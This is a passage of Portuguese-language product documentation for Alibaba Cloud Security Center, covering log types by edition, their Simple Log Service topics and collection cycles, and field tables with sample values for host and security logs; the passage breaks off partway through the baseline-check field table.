Todos os produtos
Search
Central de documentação

Security Center:Categorias e Campos de Log

Última atualização: Sep 08, 2026

A análise de logs do Security Center centraliza dados de atividades do host e eventos de segurança para auditoria, rastreamento de incidentes e detecção de ameaças. Este tópico abrange os tipos de log compatíveis, a disponibilidade por edição, os campos de log e os ciclos de coleta.

Compatibilidade por versão

Os tipos de log disponíveis dependem da sua edição do Security Center ou do nível de proteção contratado.

Subscription

Logs de host

Tipo de log

Basic

Anti-virus

Advanced Edition

Enterprise

Ultimate

Logs de fluxo de logon

Unsupported

Supported

Supported

Supported

Supported

Logs de conexão de rede

Unsupported

Supported

Supported

Supported

Supported

Logs de inicialização de processo

Unsupported

Supported

Supported

Supported

Supported

Logs de ataque de força bruta

Unsupported

Supported

Supported

Supported

Supported

Logs de solicitação DNS

Unsupported

Supported

Supported

Supported

Supported

Logs de eventos do cliente

Supported

Supported

Supported

Supported

Supported

Logs de snapshot de conta

Unsupported

Unsupported

Unsupported

Supported

Supported

Logs de snapshot de rede

Unsupported

Unsupported

Unsupported

Supported

Supported

Logs de snapshot de processo

Unsupported

Unsupported

Unsupported

Supported

Supported

Logs de módulo binário

Supported

Supported

Supported

Supported

Supported

Logs de escrita de arquivo por processo

Supported

Supported

Supported

Supported

Supported

Logs de operação de registro

Supported

Supported

Supported

Supported

Supported

Logs de segurança

Tipo de log

Basic

Anti-virus

Advanced Edition

Enterprise

Ultimate

Logs de alerta de segurança

Supported

Nota

Registra apenas alertas compatíveis com a edição Basic.

Supported

Supported

Supported

Supported

Logs de vulnerabilidade

Supported

Nota

Registra apenas vulnerabilidades compatíveis com a edição Basic.

Supported

Supported

Supported

Supported

Logs de defesa de rede

Unsupported

Supported

Supported

Supported

Supported

Logs de eventos de monitoramento de arquivos críticos

Unsupported

Unsupported

Unsupported

Supported

Supported

CSPM - Logs de verificação de linha de base

Unsupported

Unsupported

Supported

Supported

Supported

CSPM - Logs de verificação de configuração de plataforma em nuvem

Supported

Supported

Supported

Supported

Logs de proteção de aplicação

Supported

Supported

Supported

Supported

Logs de detecção de arquivos maliciosos

Supported

Supported

Supported

Supported

Logs de detecção sem agente

Supported

Supported

Supported

Supported

Logs de services de valor agregado

Se você ativar qualquer um dos seguintes services de valor agregado, o Security Center analisará os logs gerados:

  • Malicious File Detection

  • Agentless Detection

  • RASP

  • CSPM(Baseline Check e Cloud Service Configuration Risk)

Pay-as-you-go

Ao adquirir o service Host and Container Security no modelo pay-as-you-go, os tipos de log disponíveis variam conforme o nível de proteção atribuído a cada servidor.

Logs de host

Tipo de log

Unprotected

Antivirus

Comprehensive Host Protection

Hosts and Container Protection

Logs de fluxo de logon

Unsupported

Supported

Supported

Supported

Logs de conexão de rede

Unsupported

Supported

Supported

Supported

Logs de inicialização de processo

Unsupported

Supported

Supported

Supported

Logs de ataque de força bruta

Unsupported

Supported

Supported

Supported

Logs de solicitação DNS

Unsupported

Supported

Supported

Supported

Logs de eventos do cliente

Supported

Supported

Supported

Supported

Logs de snapshot de conta

Unsupported

Unsupported

Supported

Supported

Logs de snapshot de rede

Unsupported

Unsupported

Supported

Supported

Logs de snapshot de processo

Unsupported

Unsupported

Supported

Supported

Logs de segurança

Tipo de log

Unprotected

Antivirus

Comprehensive Host Protection

Hosts and Container Protection

Logs de alerta de segurança

Supported

Nota

Registra apenas alertas compatíveis com o nível Unprotected.

Supported

Supported

Supported

Logs de vulnerabilidade

Supported

Nota

Registra apenas vulnerabilidades compatíveis com o nível Unprotected.

Supported

Supported

Supported

Logs de defesa de rede

Unsupported

Supported

Supported

Supported

Logs de eventos de monitoramento de arquivos críticos

Unsupported

Unsupported

Supported

Supported

Logs de services pay-as-you-go

Ao ative qualquer um dos seguintes services pay-as-you-go, o Security Center analisa os logs gerados:

  • Malicious File Detection

  • Agentless Detection

  • RASP

  • CSPM(Baseline Check,CSPM)

Visão geral dos tipos de log

Nota

As amostras de log e as descrições de campos servem apenas como referência. Os campos podem mudar com atualizações do product. Os dados reais no SLS refletem o esquema mais atual.

A lista de campos dos logs do Security Center não inclui o campo project_id. Os logs são armazenados em um projeto do Simple Log Service (SLS). Os projetos do SLS seguem o formato de nomenclatura aliyun-cloudsiem-data-{UID}-{RegionID}, onde {UID} é o UID da sua conta Alibaba Cloud e {RegionID} é o ID da região. Um projeto SLS é um conceito de hierarquia de armazenamento, não um campo de log. Para filtrar logs por propriedade, utilize o nível de projeto SLS em vez do nível de campo de log.

Logs de host

Logs de fluxo de logon

  • __topic__: aegis-log-login

  • Conteúdo do log: Registra eventos de logon no servidor, incluindo IP de source, nome de usuário e resultado.

  • Descrição do recurso: Monitora a atividade do usuário e detecta comportamentos anômalos.

    Importante

    O Security Center não coleta logs de fluxo de logon para servidores executando Windows Server 2008.

  • Ciclo de coleta: Tempo real.

Logs de conexão de rede

  • __topic__: aegis-log-network

  • Conteúdo do log: Registra conexões de rede em tempo real nos servidores, incluindo tuplas-5 e processos associados.

  • Descrição do recurso: Identifica padrões de conexão anômalos, detecta ataques de rede e otimiza o desempenho.

    Nota

    O agente coleta apenas um subconjunto de estados de conexão entre o estabelecimento e o encerramento. O tráfego de entrada não é registrado.

  • Ciclo de coleta: Tempo real.

Logs de inicialização de processo

  • __topic__: aegis-log-process

  • Conteúdo do log: Registra eventos de inicialização para todos os novos processos, incluindo nome do processo, argumentos de linha de comando e processo pai.

  • Descrição do recurso: Rastreia inicializações de processos, detecta comportamentos anormais e identifica intrusões de malware.

  • Ciclo de coleta: Tempo real. Os logs são reportados imediatamente após a inicialização do processo.

Logs de módulo binário

  • __topic__: aegis-log-bin-module

  • Conteúdo do log: Registra informações sobre módulos binários carregados por processos, incluindo caminhos de arquivo do módulo, valores de hash, tamanhos e horários de criação.

  • Descrição do recurso: Permite entender as dependências de módulos em tempo de execução e detectar carregamento anômalo de módulos ou injeção maliciosa de DLL.

  • Ciclo de coleta: Tempo real.

Logs de escrita de arquivo por processo

  • __topic__: aegis-log-file-event

  • Conteúdo do log: Registra eventos de escrita de arquivo por processos, incluindo caminhos de arquivo, informações do processo e informações do contêiner.

  • Descrição do recurso: Rastreia o comportamento de escrita em arquivos e detecta operações anômalas, criação de arquivos maliciosos e riscos de exfiltração de dados.

  • Ciclo de coleta: Tempo real.

Logs de operação de registro

  • __topic__: aegis-log-regedit

  • Conteúdo do log: Registra eventos de operação no registro, incluindo o caminho da chave de registro, valor, tipo de dados e o processo que realizou a operação.

  • Descrição do recurso: Monitora alterações no registro e detecta malwares modificando configurações do sistema ou estabelecendo persistência.

  • Ciclo de coleta: Tempo real.

Logs de ataque de força bruta

  • __topic__: aegis-log-crack

  • Conteúdo do log: Registra tentativas de ataque de força bruta contra sistemas, aplicações e contas.

  • Descrição do recurso: Identifica ataques de força bruta, detecta logons anormais, senhas fracas e vazamentos de credenciais, além de apoiar a resposta a incidentes e análises forenses.

  • Ciclo de coleta: Tempo real.

Logs de snapshot de conta

  • __topic__: aegis-snapshot-host

  • Conteúdo do log: Registra detalhes de contas de usuário, incluindo nome de usuário, política de senha e histórico de logon.

  • Descrição do recurso:

    Importante

    Compare snapshots ao longo do tempo para monitorar alterações de conta e detectar acessos não autorizados e anomalias no status da conta.

  • Ciclo de coleta: Automático, com base no intervalo de fingerprint de ativos (padrão: uma vez por dia). A coleta manual também é compatível.

Logs de snapshot de rede

  • __topic__: aegis-snapshot-port

  • Conteúdo do log: Registra conexões de rede, incluindo tuplas-5, status e processos associados.

  • Descrição do recurso: Identifica conexões ativas, padrões anômalos e possíveis ataques de rede.

  • Ciclo de coleta: Automático, com base no intervalo de fingerprint de ativos (padrão: uma vez por dia). A coleta manual também é compatível.

Logs de snapshot de processo

  • __topic__: aegis-snapshot-process

  • Conteúdo do log: Registra a atividade de processos, incluindo IDs de processo, nomes e horários de inicialização.

  • Descrição do recurso: Monitora a atividade de processos e o consumo de recursos; detecta processos anormais, uso excessivo de CPU e vazamentos de memória.

  • Ciclo de coleta: Automático, com base no intervalo de fingerprint de ativos (padrão: uma vez por dia). A coleta manual também é compatível.

Logs de solicitação DNS

  • __topic__: aegis-log-dns-query

  • Conteúdo do log: Registra consultas DNS iniciadas pelo servidor, incluindo nomes de domínio, tipos de consulta e origens.

  • Descrição do recurso: Analisa a atividade DNS e detecta consultas anômalas, sequestro de domínio ou envenenamento.

    Importante

    A coleta de logs não é compatível com servidores Linux com versão de kernel anterior a 4.x.x.

  • Ciclo de coleta: Tempo real.

Logs de eventos do cliente

  • __topic__: aegis-log-client

  • Conteúdo do log: Registra eventos de online/offline do cliente do Security Center.

  • Descrição do recurso: Monitora a disponibilidade do cliente.

  • Ciclo de coleta: Tempo real.

Logs de segurança

Importante

Todos os logs de segurança são coletados em tempo real.

Logs de vulnerabilidade

  • __topic__: sas-vul-log

  • Conteúdo do log: Registra vulnerabilidades descobertas, incluindo nomes, status e ações de tratamento.

  • Descrição do recurso: Rastreia vulnerabilidades, avalia riscos de segurança e prioriza a correção.

CSPM - Logs de verificação de linha de base

  • __topic__: sas-hc-log

  • Conteúdo do log: Registra resultados de verificações de linha de base, incluindo níveis, categorias e níveis de risco.

  • Descrição do recurso: Avalia a postura de segurança da linha de base e identifica riscos de configuração.

    Nota

    Apenas itens de verificação que falham pela primeira vez são registrados, juntamente com itens que passaram anteriormente, mas falharam na reinspeção.

Logs de alerta de segurança

  • __topic__: sas-security-log

  • Conteúdo do log: Registra alertas de segurança, incluindo fontes de dados, detalhes e níveis de gravidade.

  • Descrição do recurso: Permite compreender ameaças de segurança e responder prontamente.

CSPM - Logs de verificação de configuração de plataforma em cloud

  • __topic__: sas-cspm-log

  • Conteúdo do log: Registra resultados de verificações de configuração da plataforma em cloud e operações de lista de permissões.

  • Descrição do recurso: Identifica problemas de configuração e riscos de segurança na plataforma em cloud.

Logs de defesa de rede

  • __topic__: sas-net-block

  • Conteúdo do log: Registra eventos de ataque de rede, incluindo tipos de ataque e endereços IP de source e destino.

  • Descrição do recurso: Detecta ataques de rede, responde a ameaças e melhora a segurança da rede.

Logs de proteção de aplicação

  • __topic__: sas-rasp-log

  • Conteúdo do log: Registra alertas de ataque RASP, incluindo tipos de ataque, dados comportamentais e IPs de atacantes.

  • Descrição do recurso: Detecta ataques na camada de aplicação e melhora a segurança em tempo de execução.

Logs de detecção de arquivos maliciosos

  • __topic__: sas-filedetect-log

  • Conteúdo do log: Registra resultados de detecção de arquivos maliciosos, incluindo informações do arquivo, cenários de detecção e resultados.

  • Descrição do recurso: Identifica programas maliciosos em arquivos offline ou armazenamento em cloud para tratamento oportuno.

Logs de eventos de monitoramento de arquivos críticos

  • __topic__: aegis-file-protect-log

  • Conteúdo do log: Registra alertas de monitoramento de arquivos críticos, incluindo caminhos de arquivo, tipos de operação e níveis de alerta.

  • Descrição do recurso: Detecta roubo ou adulteração de arquivos críticos.

Logs de detecção sem agente

  • __topic__: sas-agentless-log

  • Conteúdo do log: Registra riscos de segurança em servidores em cloud, snapshots de disco e imagens, incluindo vulnerabilidades, verificações de linha de base, amostras maliciosas e arquivos sensíveis.

  • Descrição do recurso: Visualize riscos de segurança de ativos em diferentes períodos e identifica ameaças potenciais.

Campos de logs de host

Logs de fluxo de logon

Campo

Descrição

Exemplo

instance_id

O ID da instância.

i-2zeg4zldn8zypsfg****

host_ip

O endereço IP do servidor.

192.168.XX.XX

sas_group_name

O grupo de ativos do servidor no Security Center.

default

uuid

O UUID do servidor.

5d83b26b-b7ca-4a0a-9267-12****

src_ip

O endereço IP de source usado para fazer logon no servidor.

221,11.XX.XX

dst_port

A porta usada para o logon.

22

login_type

O tipo de logon. Os valores incluem, mas não se limitam a: SSHLOGIN (ssh); RDPLOGIN (Área de Trabalho Remota); IPCLOGIN (conexão IPC).

ssh

username

O nome de usuário usado para o logon.

admin

login_count

O número de logons. Logons repetidos dentro de 1 minuto são mesclados em uma única entrada. Por exemplo, um login_count igual a 3 indica que ocorreram 3 logons no último minuto.

3

start_time

O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu.

1719472214

auth_type

Tipo de autenticação, tipo string.

  • 1: Autenticação por senha.

  • 2: Autenticação por chave.

1

success

Indica se o logon foi bem-sucedido. Valores: 1 (bem-sucedido); 0 (falhou).

1

pid

O PID do processo de autenticação.

12345

src_port

O número da porta de source do logon, tipo string.

43006

ssh_fingerprint

A impressão digital da chave ssh usada para logon, tipo string. Quando a autenticação por chave é utilizada, este campo registra a impressão digital correspondente. Quando a autenticação por senha é utilizada, este campo fica vazio.

SHA256:xxxxxxxxxxxx

Logs de conexão de rede

Campo

Descrição

Exemplo

cmd_chain

A cadeia de processos.

[ {"9883":"bash -c kill -0 -- -'6274'"} ... ]

cmd_chain_index

O índice da cadeia de processos. Use este índice para consultar a cadeia de processos correspondente.

B184

container_hostname

O nome do host dentro do contêiner.

nginx-ingress-controller-765f67fd4d-****

container_id

O ID do contêiner.

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

O ID da imagem do contêiner.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

O nome da imagem do contêiner.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

O nome do contêiner.

nginx-ingress-****

container_pid

O ID do processo dentro do contêiner.

0

net_connect_dir

A direção da conexão de rede. Valores: in (entrada); out (saída).

in

dst_ip

O endereço IP do receptor da conexão. Se net_connect_dir for out, este é o host par. Se for in, este é o host local.

192.168.XX.XX

dst_port

A porta do receptor da conexão.

443

instance_id

O ID da instância.

i-2zeg4zldn8zypsfg****

host_ip

O endereço IP do servidor.

192.168.XX.XX

parent_proc_name

O nome do arquivo do processo pai.

/usr/bin/bash

pid

O ID do processo.

14275

ppid

O ID do processo pai.

14268

proc_name

O nome do processo.

nginx

proc_path

O caminho do processo.

/usr/local/nginx/sbin/nginx

proc_start_time

O horário de inicialização do processo.

N/A

connection_type

O protocolo. Valores: tcp; raw (socket raw).

tcp

sas_group_name

O grupo de ativos do servidor no Security Center.

default

src_ip

O endereço IP de source.

100.127.XX.XX

src_port

A porta de source.

41897

srv_comm

O nome do comando associado ao processo avô.

containerd-shim

status

O status da conexão de rede. Valores: 1 (Fechado); 2 (Ouvindo); 3 (SYN enviado); 4 (SYN recebido); 5 (Estabelecido); 6 (Close wait); 7 (Fechando); 8 (FIN wait 1); 9 (FIN wait 2); 10 (Time wait); 11 (TCB excluído).

5

type

O tipo de conexão de rede em tempo real. Valores: connect (conexão TCP ativa iniciada); accept (conexão TCP recebida); listen (porta ouvindo).

listen

uid

O ID do usuário do processo.

101

username

O nome de usuário do processo.

root

uuid

O UUID do servidor.

5d83b26b-b7ca-4a0a-9267-12****

start_time

O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu.

1719472214

Logs de inicialização de processo

Campo

Descrição

Exemplo

cmd_chain

A cadeia de processos.

[ {"9883":"bash -c kill -0 -- -'6274'"} ... ]

cmd_chain_index

O índice da cadeia de processos. Use este índice para consultar a cadeia de processos correspondente.

B184

cmd_index

O índice de cada parâmetro na linha de comando. Cada par de valores marca a posição inicial e final de um parâmetro.

0,3,5,8

cmdline

A linha de comando completa usada para iniciar o processo.

ipset list KUBE-6-CLUSTER-IP

comm

O nome do comando associado ao processo.

N/A

container_hostname

O nome do host dentro do contêiner.

nginx-ingress-controller-765f67fd4d-****

container_id

O ID do contêiner.

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

O ID da imagem do contêiner.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

O nome da imagem do contêiner.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

O nome do contêiner.

nginx-ingress-****

container_pid

O ID do processo dentro do contêiner.

0

cwd

O diretório de trabalho do processo.

N/A

proc_name

O nome do arquivo do processo.

ipset

proc_path

O caminho completo do arquivo de processo.

/usr/sbin/ipset

gid

O ID do grupo de processos.

0

groupname

O nome do grupo de usuários.

group1

instance_id

O ID da instância.

i-2zeg4zldn8zypsfg****

host_ip

O endereço IP do servidor.

192.168.XX.XX

parent_cmd_line

A linha de comando do processo pai.

/usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX

parent_proc_name

O nome do arquivo do processo pai.

kube-proxy

parent_proc_path

O caminho completo do arquivo do processo pai.

/usr/local/bin/kube-proxy

pid

O ID do processo.

14275

ppid

O ID do processo pai.

14268

proc_start_time

O horário de inicialização do processo.

2024-08-01 16:45:40

parent_proc_start_time

O horário de inicialização do processo pai.

2024-07-12 19:45:19

sas_group_name

O grupo de ativos do servidor no Security Center.

default

srv_cmd

A linha de comando do processo avô.

/usr/bin/containerd

tty

O terminal de logon. N/A indica que a conta nunca fez logon em um terminal.

N/A

uid

O ID do usuário.

123

username

O nome de usuário do processo.

root

uuid

O UUID do servidor.

5d83b26b-b7ca-4a0a-9267-12****

start_time

O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu.

1719472214

Logs de ataque de força bruta

Campo

Descrição

Exemplo

instance_id

O ID da instância.

i-2zeg4zldn8zypsfg****

host_ip

O endereço IP do servidor sob ataque de força bruta.

192.168.XX.XX

sas_group_name

O grupo de ativos do servidor no Security Center.

default

uuid

O UUID do servidor sob ataque de força bruta.

5d83b26b-b7ca-4a0a-9267-12*

login_count

O número de tentativas de logon falhas. Tentativas repetidas dentro de 1 minuto são mescladas em uma única entrada. Por exemplo, um login_count igual a 3 indica 3 tentativas no último minuto.

3

src_ip

O endereço IP de source da tentativa de logon.

47.92.XX.XX

dst_port

A porta de logon.

22

login_type

O tipo de logon. Valores: SSHLOGIN (logon ssh); RDPLOGIN (logon de Área de Trabalho Remota); IPCLOGIN (logon de conexão IPC); SQLSERVER (falha de logon no SQL Server).

ssh

username

O nome de usuário do logon.

user

start_time

O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu.

1719472214

Logs de snapshot de conta

Campo

Descrição

Exemplo

account_expire

A data de expiração da conta. O valor never significa que a conta nunca expira.

never

domain

O domínio ou service de diretório ao qual a conta pertence. N/A significa que a conta não pertence a nenhum domínio.

N/A

groups

Os grupos aos quais a conta pertence. N/A significa que a conta não pertence a nenhum grupo.

["nscd"]

home_dir

O diretório home, local padrão para armazenar e gerenciar arquivos no sistema.

/Users/abc

instance_id

O ID da instância.

i-2zeg4zldn8zypsfg****

host_ip

O endereço IP do servidor.

192.168.XX.XX

last_chg

A data da última alteração da senha.

2022-11-29

last_logon

A data e hora do último logon. N/A significa que a conta nunca foi usada para fazer logon.

2023-08-18 09:21:21

login_ip

O endereço IP remoto do último logon. N/A significa que a conta nunca foi usada para fazer logon.

192.168.XX.XX

passwd_expire

A data de expiração da senha. O valor never significa que a senha nunca expira.

2024-08-24

perm

Se a conta tem permissões de root. Valores: 0 (sem permissões de root); 1 (tem permissões de root).

0

sas_group_name

O grupo de ativos do servidor no Security Center.

default

shell

O shell Linux.

/sbin/nologin

status

O status da conta de usuário. Valores: 0 (logon proibido); 1 (logon permitido).

0

tty

O terminal de logon. N/A significa que a conta nunca fez logon em um terminal.

N/A

username

O nome de usuário.

nscd

uuid

O UUID do servidor.

5d83b26b-b7ca-4a0a-9267-12****

warn_time

A data de lembrete de expiração da senha. O valor never significa que nenhum lembrete está definido.

2024-08-20

start_time

O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu.

1719472214

Logs de snapshot de rede

Campo

Descrição

Exemplo

net_connect_dir

A direção da conexão de rede. Valores: in (entrada); out (saída). Observação: Como apenas logs com status 2 são entregues, net_connect_dir é sempre in.

in

dst_ip

O endereço IP par, geralmente vazio. Observação: Como apenas logs com status 2 são entregues, dst_ip está sempre vazio (o IP par); src_ip é o IP local.

dst_port

A porta do receptor da conexão.

443

instance_id

O ID da instância.

i-2zeg4zldn8zypsfg****

host_ip

O endereço IP do servidor.

192.168.XX.XX

pid

O ID do processo.

682

proc_name

O nome do processo.

sshd

connection_type

O protocolo. Valores: tcp4 (TCP sobre IPv4); tcp6 (TCP sobre IPv6).

tcp4

sas_group_name

O grupo de ativos do servidor no Security Center.

default

src_ip

O endereço IP local.

100.127.XX.XX

src_port

A porta de escuta.

41897

status

O valor é 2, indicando que a porta está ouvindo; o src_ip/src_port associado é o endereço de escuta. Outros status não são entregues. Valores restantes possíveis (não entregues atualmente): 1 (Fechado); 3 (SYN enviado); 4 (SYN recebido); 5 (Estabelecido); 6 (Close wait); 7 (Fechando); 8 (FIN wait 1); 9 (FIN wait 2); 10 (Time wait); 11 (TCB excluído).

5

uuid

O UUID do servidor.

5d83b26b-b7ca-4a0a-9267-12****

start_time

O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu.

1719472214

Logs de snapshot de processo

Campo

Descrição

Exemplo

cmdline

A linha de comando completa usada para iniciar o processo.

/usr/local/share/assist-daemon/assist_daemon

instance_id

O ID da instância.

i-2zeg4zldn8zypsfg****

host_ip

O endereço IP do servidor.

192.168.XX.XX

md5

O hash MD5 do arquivo binário. Arquivos maiores que 1 MB não são calculados.

1086e731640751c9802c19a7f53a64f5

proc_name

O nome do arquivo do processo.

assist_daemon

proc_path

O caminho completo do arquivo de processo.

/usr/local/share/assist-daemon/assist_daemon

pid

O ID do processo.

1692

pname

O nome do arquivo do processo pai.

systemd

sas_group_name

O grupo de ativos do servidor no Security Center.

default

proc_start_time

O horário de inicialização do processo. Campo interno.

2023-08-18 20:00:12

uid

O ID do usuário do processo.

101

username

O nome de usuário do processo.

root

uuid

O UUID do servidor.

5d83b26b-b7ca-4a0a-9267-12****

start_time

O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu.

1719472214

Logs de solicitação DNS

Campo

Descrição

Exemplo

domain

O nome de domínio correspondente à solicitação DNS.

example.aliyundoc.com

instance_id

O ID da instância.

i-2zeg4zldn8zypsfg****

host_ip

O endereço IP do servidor que iniciou a solicitação DNS.

192.168.XX.XX

pid

O ID do processo que iniciou a solicitação DNS.

3544

ppid

O ID do processo pai que iniciou a solicitação DNS.

3408

cmd_chain

A cadeia de processos que iniciou a solicitação DNS.

"3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\""

cmdline

A linha de comando que iniciou a solicitação DNS.

C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe

proc_path

O caminho do processo que iniciou a solicitação DNS.

C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe

sas_group_name

O grupo de ativos do servidor no Security Center.

default

time

O horário em que o evento de solicitação DNS foi capturado. Este horário geralmente corresponde à ocorrência real da solicitação DNS.

2023-08-17 20:05:04

uuid

O UUID do servidor que iniciou a solicitação DNS.

5d83b26b-b7ca-4a0a-9267-12****

start_time

O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu.

1719472214

Logs de eventos do cliente

Campo

Descrição

Exemplo

uuid

O UUID do servidor.

5d83b26b-b7ca-4a0a-9267-12****

host_ip

O endereço IP do servidor.

192.168.XX.XX

agent_version

A versão do cliente.

aegis_11_91

last_login

O timestamp do logon anterior, em milissegundos.

1716444387617

platform

O tipo de sistema operacional. Valores: windows; linux.

linux

region_id

O ID da região onde o servidor reside.

cn-beijing

status

O status do cliente. Valores: online; offline.

online

start_time

O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu.

1719472214

Logs de módulo binário

Campo

Descrição

Exemplo

user_id

O ID do usuário.

123

host_ip

O endereço IP da máquina cliente.

1.2.3.4

uuid

O UUID do servidor.

inet-eb7c23e9-1352-4f03-a1b3-73800d3524da

proc_list

A lista de processos que carregaram o módulo, no formato json.

[{"path":"C:/Windows/System32/svchost.exe","cmdline":"...","pid":84,"md5":"..."}]

file_path

O caminho do arquivo do módulo.

c:\\windows\\system32\\msvcrt.dll

md5

O hash MD5 do módulo.

d80c5d199b7700b89dbdc52ab58c7519

sha256

O hash SHA256 do módulo. Uma string vazia indica que não foi calculado.

file_size

O tamanho do módulo, em bytes.

800008

bin_create

O horário de criação do módulo.

2017-06-08 11:49:55

bin_modified

O horário da última modificação do módulo.

2014-10-29 11:06:28

source

O identificador do tipo de source.

5

start_time

O timestamp de gravação do log, em segundos (timestamp Unix).

1719472214

Logs de escrita de arquivo por processo

Campo

Descrição

Exemplo

user_id

O ID do usuário.

123

host_ip

O endereço IP da máquina cliente.

1.2.3.4

uuid

O UUID do servidor.

inet-eb7c23e9-1352-4f03-a1b3-73800d3524da

proc_path

O caminho do processo que operou o arquivo.

/home/shared/app_bin/maple_ffmpeg

cmdline

A linha de comando completa do processo.

/home/shared/app_bin/maple_ffmpeg -y -threads 4 -i ...

event_type

O tipo de evento de operação de arquivo, como open ou write.

open

file_path

O caminho do arquivo operado.

/home/shared/app-video-trans/dbe36b1f-.../...

parent_proc_path

O caminho do arquivo executável do processo pai.

/usr/java/jdk1.8.0_171/bin/java

pid

O ID do processo.

882378

ppid

O ID do processo pai.

1019718

pstime

O horário de inicialização do processo pai.

2025-10-30 12:02:38

proc_start_time

O horário de inicialização do processo.

2025-10-30 12:02:38

cmd_chain

A cadeia de invocação de processos, no formato json.

[{"882378":"/home/shared/app_bin/maple_ffmpeg..."}]

cmd_chain_index

O identificador de índice da cadeia de comandos.

P47948934

srv_cmd

A linha de comando do service associado.

/usr/bin/python /usr/bin/supervisord -c /etc/supervisord.conf

srv_comm

O nome do service associado.

supervisord

flag

O valor do sinalizador de operação de arquivo.

33345

old_file_path

O caminho original do arquivo antes de renomear ou mover.

username

O nome de usuário que realizou a operação.

container_id

O ID do contêiner.

container_name

O nome do contêiner.

container_hostname

O nome do host dentro do contêiner.

container_image_id

O ID da imagem do contêiner.

container_image_name

O nome da imagem do contêiner.

start_time

O timestamp de gravação do log, em segundos (timestamp Unix).

1719472214

Logs de operação de registro

Campo

Descrição

Exemplo

user_id

O ID do usuário.

123

host_ip

O endereço IP da máquina cliente.

1.2.3.4

uuid

O UUID do servidor.

inet-eb7c23e9-1352-4f03-a1b3-73800d3524da

registry_key

O caminho da chave de registro que foi operada.

\\REGISTRY\\MACHINE\\SOFTWARE\\WOW6432Node\\...

registry_value

O valor da chave de registro.

N/A

registry_type

O tipo de dados da chave de registro.

N/A

key_account

A conta que realizou a operação de registro.

N/A

proc_path

O caminho do processo que realizou a operação de registro.

C:/Program Files (x86)/ManageEngine/UEMS_Agent/bin/DCProcessMonitor.exe

cmdline

A linha de comando do processo.

DCProcessMonitor.exe

pid

O ID do processo.

11060

ppid

O ID do processo pai do processo.

2272

time

O horário em que a operação de registro ocorreu.

2025-11-12 10:32:42

start_time

O timestamp de gravação do log, em segundos (timestamp Unix).

1719472214

Campos de logs de segurança

Logs de vulnerabilidade

Campo

Descrição

Exemplo

vul_alias_name

O alias da vulnerabilidade.

CESA-2023:1335: openssl Security Update

risk_level

O nível de risco. Valores: asap (Alto); later (Médio); nntf (Baixo).

later

extend_content

Informações estendidas da vulnerabilidade no formato json.

{"cveList":["CVE-2023-0286"],"necessity":{...},"os":"centos",...}

instance_id

O ID da instância.

i-2zeg4zldn8zypsfg****

internet_ip

O endereço IP público do ativo.

39.104.XX.XX

intranet_ip

O endereço IP privado do ativo.

192.168.XX.XX

instance_name

O nome do host.

hhht-linux-***

vul_name

O nome da vulnerabilidade.

centos:7:cesa-2023:1335

operation

A ação realizada na vulnerabilidade. Valores: new (Nova); verify (Verificar); fix (Corrigir).

new

status

O status da vulnerabilidade. Valores: 1 (Não corrigida); 2 (Falha na correção); 3 (Falha na reversão); 4 (Corrigindo); 5 (Revertendo); 6 (Verificando); 7 (Corrigida); 8 (Corrigida, reinicialização necessária); 9 (Revertida); 10 (Ignorada); 11 (Revertida, reinicialização necessária); 12 (Não existe); 13 (Inválida).

1

tag

A tag da vulnerabilidade. Valores: oval (vulnerabilidade de software Linux); system (vulnerabilidade de sistema Windows); app (vulnerabilidade de aplicação). Tags para outros tipos de vulnerabilidade são strings aleatórias.

oval

type

O tipo de vulnerabilidade. Valores: sys (vulnerabilidade de sistema Windows); cve (vulnerabilidade de software Linux); emg (vulnerabilidade urgente).

sys

uuid

O UUID do servidor.

ad66133a-dc82-4e5e-9659-a49e3****

start_time

O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu.

1719472214

CSPM - Logs de verificação de linha de base

Campo

Descrição

Exemplo

check_item_name

O nome do item de verificação.

Defina intervalo mínimo para alterações de senha

check_item_level

O nível de gravidade da verificação de linha de base. Valores: high (Alto); medium (Médio); low (Baixo).

medium

check_type

O tipo do item de verificação.

Autenticação de identidade

instance_id

O ID da instância.

i-2zeg4zldn8zypsfg****

risk_level

O nível de risco. Valores: high (Alto); medium (Médio); low (Baixo).

medium

operation

A operação. Valores: new (Novo); verity (Validação).

new

risk_name

O nome do item de risco.

Verificação de conformidade da política de senha

sas_group_name

O grupo de ativos do servidor no Security Center onde o item de risco foi detectado.

default

status

As informações de status. Dois conjuntos de códigos de status se aplicam: Status de verificação de linha de base: 1 (Falhou); 2 (Verificando); 6 (Ignorado); 7 (Corrigindo). Status de tratamento: 1 (Não corrigido); 2 (Falha na correção); 3 (Falha na reversão); 4 (Corrigindo); 5 (Revertendo); 6 (Verificando); 7 (Corrigido); 8 (Corrigido, reinicialização necessária); 9 (Revertido); 10 (Ignorado); 11 (Revertido, reinicialização necessária); 12 (Não existe); 13 (Inválido).

1

sub_type_alias_name

O alias do subtipo.

Melhores práticas internacionais de segurança - Verificação de linha de base de segurança Ubuntu 16/18/20/22

sub_type_name

O nome do subtipo de linha de base. Para valores válidos, consulte List of baseline types and subtypes.

